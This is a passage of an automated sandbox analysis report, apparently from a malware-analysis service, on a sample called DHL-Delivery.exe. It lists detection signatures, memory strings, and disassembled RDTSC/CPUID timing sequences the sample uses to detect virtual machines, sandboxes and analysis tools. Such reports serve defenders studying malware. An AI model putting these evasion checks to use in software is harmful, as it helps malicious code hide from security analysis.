    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_00565599 push es; retf 6_2_00566A93
    Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD NtSetInformationThread,LoadLibraryA,0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2A1B 0_2_021A2A1B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2A51 0_2_021A2A51
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A28FF 0_2_021A28FF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2921 NtSetInformationThread,LoadLibraryA,0_2_021A2921
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2942 0_2_021A2942
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2980 0_2_021A2980
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A29C5 0_2_021A29C5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A1E31 NtSetInformationThread,LoadLibraryA,0_2_021A1E31
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A907A second address: 00000000021A907A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FBA20A7EA58h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test bh, bh 0x00000021 cmp dh, bh 0x00000023 jmp 00007FBA20A7EA6Eh 0x00000025 cmp edx, D844CA05h 0x0000002b add edi, edx 0x0000002d cmp cl, al 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 test bh, bh 0x00000037 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003e jne 00007FBA20A7EA09h 0x00000040 nop 0x00000041 cmp dh, FFFFFFA9h 0x00000044 test dx, bx 0x00000047 call 00007FBA20A7EAC7h 0x0000004c call 00007FBA20A7EA6Ah 0x00000051 lfence 0x00000054 mov edx, dword ptr [7FFE0014h] 0x0000005a lfence 0x0000005d ret 0x0000005e mov esi, edx 0x00000060 pushad 0x00000061 rdtsc
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmpBinary or memory string: 9C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNS.EXEC
    Source: SearchUI.exe, 00000019.00000003.2903086858.000001E69FFC1000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\COBIAN BACKUP 11\CBINTERFACE.EXE
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: :C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNSC.EXE`/
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: 9C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNS.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: QP9B AUTORUNS.EXEJ
    Source: SearchUI.exe, 00000019.00000003.2903086858.000001E69FFC1000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE
    Source: DHL-Delivery.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmpBinary or memory string: :C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNSC.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE11798
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: |!MAUTORUNS.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: A278AB0D.MODERNCOMBATFUTUREWAR_H6ADKY7GBF63M!APPPANDORAMEDIAINC.29680B314EFC2_N619G4D5J0FNW!PANDORAAPP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINAMP\WINAMP.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\UNIKEY\UNIKEYNT.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXEA278AB0D.MODERNCOMBAT5BLACKOUT_H6ADKY7GBF63M!APPAMZNMOBILELLC.KINDLEFORWINDOWS8_STFE6VWA9JNBP!COM.AMAZON.KINDLEGAMELOFTSA.DESPICABLEMEMINIONRUSH_0PP20FCEWVVTJ!APP26720RANDOMSALADGAMESLLC.SIMPLESOLITAIRE_KX24DQMAZQK8J!APPMICROSOFT.APPV.CLIENT.VAPP.27CFF4A30D2525B2845582ACF20FFB10
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXEPT
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A941D second address: 00000000021A945F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 fnop 0x00000005 cmp al, 80h 0x00000007 test dh, dh 0x00000009 test ah, FFFFFFABh 0x0000000c jmp 00007FBA20C36362h 0x0000000e cmp ax, cx 0x00000011 cmp ax, ax 0x00000014 cmp bx, bx 0x00000017 mov eax, 00000539h 0x0000001c pushad 0x0000001d mov eax, 000000A4h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A907A second address: 00000000021A907A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FBA20A7EA58h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test bh, bh 0x00000021 cmp dh, bh 0x00000023 jmp 00007FBA20A7EA6Eh 0x00000025 cmp edx, D844CA05h 0x0000002b add edi, edx 0x0000002d cmp cl, al 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 test bh, bh 0x00000037 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003e jne 00007FBA20A7EA09h 0x00000040 nop 0x00000041 cmp dh, FFFFFFA9h 0x00000044 test dx, bx 0x00000047 call 00007FBA20A7EAC7h 0x0000004c call 00007FBA20A7EA6Ah 0x00000051 lfence 0x00000054 mov edx, dword ptr [7FFE0014h] 0x0000005a lfence 0x0000005d ret 0x0000005e mov esi, edx 0x00000060 pushad 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A90B8 second address: 00000000021A90B8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FBA20C36B56h 0x0000001f popad 0x00000020 call 00007FBA20C364DEh 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A097F second address: 00000000021A09F1 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 call 00007FBA20A82E40h 0x00000008 call 00007FBA20A7EAC6h 0x0000000d jmp 00007FBA20A7EA6Eh 0x0000000f test bh, bh 0x00000011 mov eax, dword ptr [esp] 0x00000014 cmp dl, 00000038h 0x00000017 inc eax 0x00000018 ret 0x00000019 ret 0x0000001a pushad 0x0000001b mov bx, 0497h 0x0000001f cmp bx, 0497h 0x00000024 jne 00007FBA20A7E9E7h 0x00000026 popad 0x00000027 mov dword ptr [eax+04h], edx 0x0000002a test ebx, BB589C5Ch 0x00000030 test dx, dx 0x00000033 test cl, dl 0x00000035 cmp ch, ah 0x00000037 jmp 00007FBA20A7EA6Ah 0x00000039 cmp ah, ch 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e mov bx, D41Bh 0x00000042 cmp bx, D41Bh 0x00000047 jne 00007FBA20A7E9ACh 0x0000004d popad 0x0000004e push 00000000h 0x00000050 test ebx, 3E544ED9h 0x00000056 push dword ptr [ebp+24h] 0x00000059 test dx, dx 0x0000005c push 00000000h 0x0000005e test cl, dl 0x00000060 push 00000000h 0x00000062 cmp ch, ah 0x00000064 push 00000000h 0x00000066 pushad 0x00000067 mov esi, 000000B8h 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000021A0CCD second address: 00000000021A0D2A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pushad 0x00000004 mov bx, 63E6h 0x00000008 cmp bx, 63E6h 0x0000000d jne 00007FBA20C35F8Eh 0x00000013 popad 0x00000014 test ebx, 4E69577Bh 0x0000001a xor esi, esi 0x0000001c jmp 00007FBA20C3635Eh 0x0000001e push edx 0x0000001f mov edx, F9819563h 0x00000024 cmp edx, F9819563h 0x0000002a jne 00007FBA20C35EAAh 0x00000030 pop edx 0x00000031 test al, dl 0x00000033 test cx, bx 0x00000036 test bh, bh 0x00000038 mov edi, dword ptr [ebp+20h] 0x0000003b pushad 0x0000003c mov esi, 0000000Ah 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 000000000056941D second address: 000000000056945F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 fnop 0x00000005 cmp al, 80h 0x00000007 test dh, dh 0x00000009 test ah, FFFFFFABh 0x0000000c jmp 00007FBA20A7EA72h 0x0000000e cmp ax, cx 0x00000011 cmp ax, ax 0x00000014 cmp bx, bx 0x00000017 mov eax, 00000539h 0x0000001c pushad 0x0000001d mov eax, 000000A4h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exeRDTSC instruction interceptor: First address: 00000000005690B8 second address: 00000000005690B8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FBA20C36B56h 0x0000001f popad 0x00000020 call 00007FBA20C364DEh 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1E6A1E20000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1EEA3000000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1E6A1F60000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1EEA3420000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1EEA3800000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD rdtsc 0_2_021A9AFD
    Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
    Source: C:\Users\user\Desktop\DHL-Delivery.exeAPI coverage: 1.4 %
    Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 1.8 %
    Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6380Thread sleep time: -80000s >= -30000sJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\TileDataRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\Windows.StateRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\StateRepository.Core.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\appresolver.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\profext.dll
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyper v4225
    Source: SearchUI.exe, 00000019.00000003.2903311597.000001E69FBD9000.00000004.00000001.sdmpBinary or memory string: .09738VMwareInc.VMwareViewClient_23chmsjxv380w!AppC:\SG Interactive\Crossfire Europe\CF_SGIN.exeA278AB0D.OrderChaos_h6adky7gbf63m!AppApp~5`vW9AWA$!!!!!MKKSkPPTViewerWebDownloadFiles<A278AB0D.AsphaltOverdrive_h6adky7gbf63m!App
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: C:\Bovada\BovadaPoker.exeVMware.View.Client77160C:\EVE\Launcher\evelauncher.exeuplay://launch/568/0QuizUp.QuizUp_n36z36qeaxk8a!AppInfoPath.Designer.410736
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe
    Source: DHL-Delivery.exe, 00000006.00000003.2067678598.00000000007A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW&
    Source: DHL-Delivery.exe, 00000006.00000003.2067678598.00000000007A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW Kernel Debug Network Adapter
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: Mathworks.MATLAB.MATLAB.R2015bVMware.Workstation.vmui
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: Microsoft.Office.MSPUB.EXE.15VisualStudio.12.0903DB504.QQ_a99ra4d2cbcxa!AppVMware.Workstation.vmplayerC:\wamp\wampmanager.exe
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: VMware.Horizon.Client9116
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmui
    Source: DHL-Delivery.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PaperCut MF Client\pc-client.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MetaTrader 4\terminal.exeexe11083{6D809377-6AF0-444B-8957-A3773F02200E}\OrCAD_Demo\PSpice\psched.exe
    Source: explorer.exe, 00000007.00000002.2742124576.000000000E3B0000.00000002.00000001.sdmp, cmd.exe, 0000000B.00000002.2190137433.0000000000BA0000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.2747253396.00000243B7910000.00000002.00000001.sdmpBinary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
    Source: DHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000007.00000002.2721404387.0000000004FF6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: VMware.View.Client
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
    Source: explorer.exe, 00000012.00000002.3680771366.00000000071E2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|vmware horizon client*|view2527
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmui7347
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: sica*|music2041*|guild wars 2*|gw22732*|h&r block 2014*|hr417*|h&r block 2015*|hr583*|hard disk sentinel*|hd888*|hd tune*|hdtune1481*|hd tune pro*|hdtune2229*|heroes of newerth*|hon1427*|hesap makinesi*|calcu3363*|hi-rez diagnostics and support*|hi rez2380*|hi-rez diagnostics and support*|hirez1973*|home*|roxio1*|hotspot shield*|hss4218*|hp aio printer remote*|hp printer2738*|hp scan*|hpscan4913*|hp support assistant*|hp ass4255*|hp support assistant*|hps4890*|hrs toolbar*|bing896*|hwmonitor*|cpui5232*|hyper-v manager*|hyper v4225*|hyper-v manager*|hyperv3631*|i.r.i.s. ocr registration*|iris1265*|idle (python 3.5 32-bit)*|python idle5058*|idle (python gui)*|python idle4801*|ignite*|aeria1782*|iheartradio*|i heart5460*|image composite editor*|ice215*|intel(r) driver update utility*|intel driver3178*|intel(r) extreme tuning utility*|xtu1622*|intel
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmplayer
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe11333
    Source: SearchUI.exe, 00000019.00000003.2843676717.000001E69FB1D000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SleepTimer Ultimate\SleepTimerUltimate.exe11362
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|vmware player*|vmplayer4486
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe11073
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmplayer7859
    Source: SearchUI.exe, 00000019.00000003.2903311597.000001E69FBD9000.00000004.00000001.sdmpBinary or memory string: VMwareInc.VMwareViewClient_23chmsjxv380w!App
    Source: SearchUI.exe, 00000019.00000003.2843676717.000001E69FB1D000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
    Source: SearchUI.exe, 00000019.00000003.3116756564.000001EEA3FD4000.00000004.00000001.sdmpBinary or memory string: onenotefirefoxvmwareitunesoutlookexcel
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: 7585*|visual studio code*|visual code4839*|visual studio command prompt (2010)*|cmd1*|vlc media player*|vlc player7339*|vmware horizon client*|view2527*|vmware player*|vmplayer4486*|vmware vsphere client*|vcenter5892*|vmware vsphere client*|vp5534*|vmware workstation 12 player*|vmplayer5018*|voice & video calls*|skype1*|voice recorder*|windows voice recorder6771*|voice recorder*|audio recording7257*|voice recorder*|sound recording7522*|voice recorder*|voice recording6853*|voice recorder*|audio recorder5989*|voice recorder*|sound recorder3824*|voice recorder*|record audio6892*|voice recorder*|recording5289*|voice recorder*|recoder6595*|voice recorder*|recore6931*|voice recorder*|vioce6945*|voice recorder*|voive7212*|voice recorder*|recr7315*|voice recorder*|soud7302*|volume activation management tool 3.1*|vamt1*|vpn access manager*|shrew3739*|vuze*|azu5812*|weather*|do i need an umbrella6537*|weather*|will it rain tomorrow6720*|weather*|will it rain today6641*|weather*|local weather6239*|weather*|the weather6785*|weather*|weather app6864*|weather*|forecast6745*|weather*|wheather5739*|weather*|waether6597*|weather*|weatehr6974*|weather*|wather6190*|weather*|weater5429*|weather*|weathr6639*|weather*|wether5219*|where
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyperv3631
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vp5534
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|vmware workstation 12 player*|vmplayer5018
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: VMwareInc.VMwareViewClient_23chmsjxv380w!App11470
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5892
